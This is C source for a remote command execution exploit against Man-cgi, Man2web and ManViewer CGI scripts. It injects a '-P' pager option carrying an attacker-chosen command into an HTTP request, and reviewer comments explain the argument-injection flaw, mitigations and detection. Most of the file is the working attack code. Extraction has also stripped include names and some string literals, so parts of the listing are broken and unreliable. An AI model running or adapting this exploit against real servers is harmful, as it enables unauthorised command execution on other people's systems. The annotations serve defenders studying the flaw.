/* Multipie man-2-web cgi scripts remote command execution exploit
   Exploit coded and bugs found by tracewar of DarkLogic.
   Greetings goes to: Matan Peretz - Lijojon :-) Ofer Shaked setuid alex
   majestic - do I know you ? Yacha - Peace. Special greetings to crazy
   cookie my perfect girlfriend.. Oh yea and a tiny piece of crap goes to
   [maorbn], dude you suck get some skills loser ;x
   I don't take any responsibility of what this code may do - the only
   reason i release this code is for educational purposes! */

/*
 * NOTE(review): what this file demonstrates, for defenders reading it.
 *
 * The program builds a single HTTP request line of the form
 * "GET <cgi-path>?<params>\r\n" (no HTTP version, i.e. an HTTP/0.9-style
 * simple request) in which one CGI parameter starts with "-P " followed by
 * an attacker-chosen string.  The affected CGI front-ends (Man-cgi, Man2web,
 * ManViewer per usage()) apparently hand that parameter to man(1) without
 * rejecting option-like values, and "-P" is man's pager option, so the
 * string is executed as a program.  The root cause is therefore classic
 * argument injection: untrusted input reaching a command line where a
 * leading '-' changes its meaning.
 *
 * Mitigation on the CGI side: validate the topic/section/program values
 * against a strict allow-list (e.g. [A-Za-z0-9._-]+ not starting with '-')
 * and/or terminate option parsing with "--" before user-supplied arguments;
 * also avoid invoking the shell at all.  Detection: requests to man-cgi
 * style endpoints whose query string contains "-P" (or "%20-P"), and
 * version-less "GET ... \r\n" request lines, are both good signals.
 *
 * The five #include lines below lost their header names during extraction
 * (angle-bracketed text was stripped).  The code as written uses stdio
 * (printf/fprintf), stdlib (atoi/exit), string (strcat/memset/strlen/
 * strncmp), BSD sockets + netdb (socket/connect/send/recv/htons/
 * gethostbyname/bcopy) and unistd (close) facilities; restore accordingly
 * if rebuilding.  Several string literals in main() were likewise mangled
 * (see the notes there), so this listing does not compile as shown.
 */
#include
#include
#include
#include
#include

/*
 * usage - print the banner/usage text to stderr and exit(0).
 *
 * @argv0: program name as given in argv[0], echoed in the usage line.
 *
 * The "usage: %s \n" line originally listed the positional arguments; the
 * bracketed placeholders were stripped by extraction.  From main()'s use of
 * argv the expected order is: argv[1] host, argv[2] command string,
 * argv[3] CGI path, argv[4] TCP port, argv[5] target id (0, 1 or 2).
 *
 * Note: the "short \ commands problem" literal contains a backslash-space
 * escape, which is not a valid C escape sequence (most likely a line
 * continuation whose newline was collapsed to a space during extraction).
 * The target labels are also inconsistent: the banner says "ManViewer" but
 * the targets line calls id 2 "Man2html".
 */
void usage(char *argv0) {
    fprintf(stderr, "[PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE]\n");
    fprintf(stderr, "Man-cgi/Man2web/ManViewer Remote Command Execution Exploit\n");
    fprintf(stderr, "Exploit coded and bugs found by tracewar of DarkLogic\n");
    fprintf(stderr, "tested against:\n[+] Man-cgi 1.11 on RedHat Enterprise Linux AS release 3 (Taroon Update 4)\n");
    fprintf(stderr, "[+] Man2web (ALL VERSIONS) - little problem with the cleanup fix it yourself, short \ commands problem\n");
    fprintf(stderr, "[+] ManViewer (ALL VERSIONS) - Limited commands\n");
    fprintf(stderr, "usage: %s \n", argv0);
    fprintf(stderr, "targets: 0=Man-cgi 1=man2web 2=Man2html\n");
    fprintf(stderr, "[PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE]\n");
    exit(0);
}

/*
 * main - build the request, send it, read the whole reply, print a slice.
 *
 * Returns 0 on success.  On every error path it does
 * "return printf(...)", i.e. the process exit status is the number of
 * characters printed, not a meaningful error code.
 *
 * Memory-safety defects worth knowing about before running this tool at
 * all (it is itself unsafe against a hostile or merely large response):
 *  - argv[2] and argv[3] are strcat()ed into dummy[50000] and then copied
 *    byte-for-byte (spaces expanded to "%20") into buffer[2000] with no
 *    bound check, so long arguments overflow buffer.
 *  - the recv() loop reads up to 2000 bytes into buffer and strcat()s it
 *    into dummy: a full 2000-byte read leaves buffer without a NUL
 *    terminator, buffer is never cleared between reads (stale tail bytes
 *    get appended), and dummy overflows once the reply exceeds ~50000
 *    bytes.
 *  - the marker-search loops for targets 0 and 2 advance cp until
 *    strncmp() matches, with no end-of-buffer check; a reply that lacks
 *    the marker runs the scan off the end of dummy.
 */
int main(int argc, char **argv) {
    int sock, i, j;
    struct sockaddr_in serv_addr;
    struct hostent *crap;
    char *cp, dummy[50000], buffer[2000] = "GET ";  /* buffer: request line, then reused as recv() chunk */

    /* Dummy is huge for the recv() later, I could've used a pointer and
       malloc everytime the while() loop did the trick ;x You can call me
       lazy :-) */
    if(argc < 6) usage(argv[0]);

    /* Per-target query string.  In every case argv[3] (CGI path) is
       followed by a parameter whose value begins with "-P" and then
       argv[2]; targets 0 and 1 append " ls", target 2 adds "&topic=w". */
    if(atoi(argv[5]) == 0) {
        memset(dummy, 0x00, 50000);
        strcat(dummy, argv[3]);
        strcat(dummy, "?-P ");
        strcat(dummy, argv[2]);
        strcat(dummy, " ls");
    } else if(atoi(argv[5]) == 1) {
        memset(dummy, 0x00, 50000);
        strcat(dummy, argv[3]);
        strcat(dummy, "?program=-P ");
        strcat(dummy, argv[2]);
        strcat(dummy, " ls");
    } else if(atoi(argv[5]) == 2) {
        memset(dummy, 0x00, 50000);
        strcat(dummy, argv[3]);
        strcat(dummy, "?section=-P");
        strcat(dummy, argv[2]);
        strcat(dummy, "&topic=w");
    } else usage(argv[0]);

    /* Defect: "%20" inside a printf format is parsed as a conversion
       ("%20 " is not a valid specifier), so this is undefined behaviour;
       the literal should be "%%20". */
    printf("[+] Made our evil buffer switching spaces with %20 and requesting..\n");

    /* Copy dummy into buffer starting at offset 4 (after "GET "), replacing
       each space with "%20".  Mixing strcat() with indexed writes works
       only because buffer's tail is zero-initialised by the "GET "
       initialiser; there is no bound check against sizeof buffer. */
    for(i=0, j=4;i < strlen(dummy);i++) {
        if(dummy[i] == ' ') {
            strcat(buffer, "%20");
            j+=3;
        } else {
            buffer[j] = dummy[i];
            j++;
        }
    }
    strcat(buffer, "\r\n");  /* no HTTP version: an HTTP/0.9-style simple request */

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0) return printf("[-] Error creating socket.\n");
    crap = gethostbyname(argv[1]);
    if(crap == NULL) return printf("[-] Cant resolve the specified hostname: %s\n", argv[1]);
    else printf("[+] Resolved the remote hostname, connecting...\n");
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(atoi(argv[4]));
    bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);
    /* connect() is passed a struct sockaddr_in * without the usual
       (struct sockaddr *) cast; the error message prints argv[3] (the CGI
       path) where the port argv[4] was meant. */
    if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0) return printf("[-] Error connecting to %s:%d\n", argv[1], atoi(argv[3]));
    printf("[+] Connected! sending our evil request... ");
    if( (send(sock, buffer, strlen(buffer), 0)) == -1 ) return printf("\n[-] Error sending the evil request :(\n");
    printf("Sent!\n");
    printf("[+] Waiting for the server answer...\n");

    /* Accumulate the entire reply into dummy; see the defect list above. */
    memset(buffer, 0x00, 2000);
    memset(dummy, 0x00, 50000);
    printf("[+] Got:\n\n");
    while(recv(sock, buffer, 2000, 0) > 0) strcat(dummy, buffer);
    cp = &dummy[0];
    i = 0;

    /* Bahhh this filtering sucks ass, you can clean this alot */
    /* Reply trimming.  The markers searched for below were HTML tags that
       extraction stripped from this listing: the two literals spanning a
       line break (compared with length 4) and the empty literal (length 5)
       are unrecoverable here; given the later "pre"/"PRE" comparisons they
       presumably were <pre>-style tags.  i tracks how far cp advanced so
       the start of the slice can be recomputed from dummy afterwards. */
    if(atoi(argv[5]) == 0) {
        while(strncmp(cp, "
", 4)) {
            cp++;
            i++;
        }
        cp+=4;
        while(strncmp(cp, "
", 4) && strncmp(cp, "", 5)) {
            cp++;
            i++;
        }
        cp+=4;
        while(strncmp(cp, "pre", 3)) cp++;
        *cp = '\0';  /* cut the reply at the closing marker */
        cp = &dummy[0] + i + 6;
    } else if(atoi(argv[5]) == 2) {
        while(strncmp(cp, "PRE", 3)) {
            cp++;
            i++;
        }
        cp+=2;
        while(strncmp(cp, "PRE", 3)) cp++;
        *cp = '\0';
        cp = &dummy[0] + i + 2;
    }
    /* target 1 gets no trimming: the whole reply is printed */
    printf("%s", cp);
    printf("\n\n");
    printf("[+] Good Bye!\n");
    close(sock);
    return 0;
}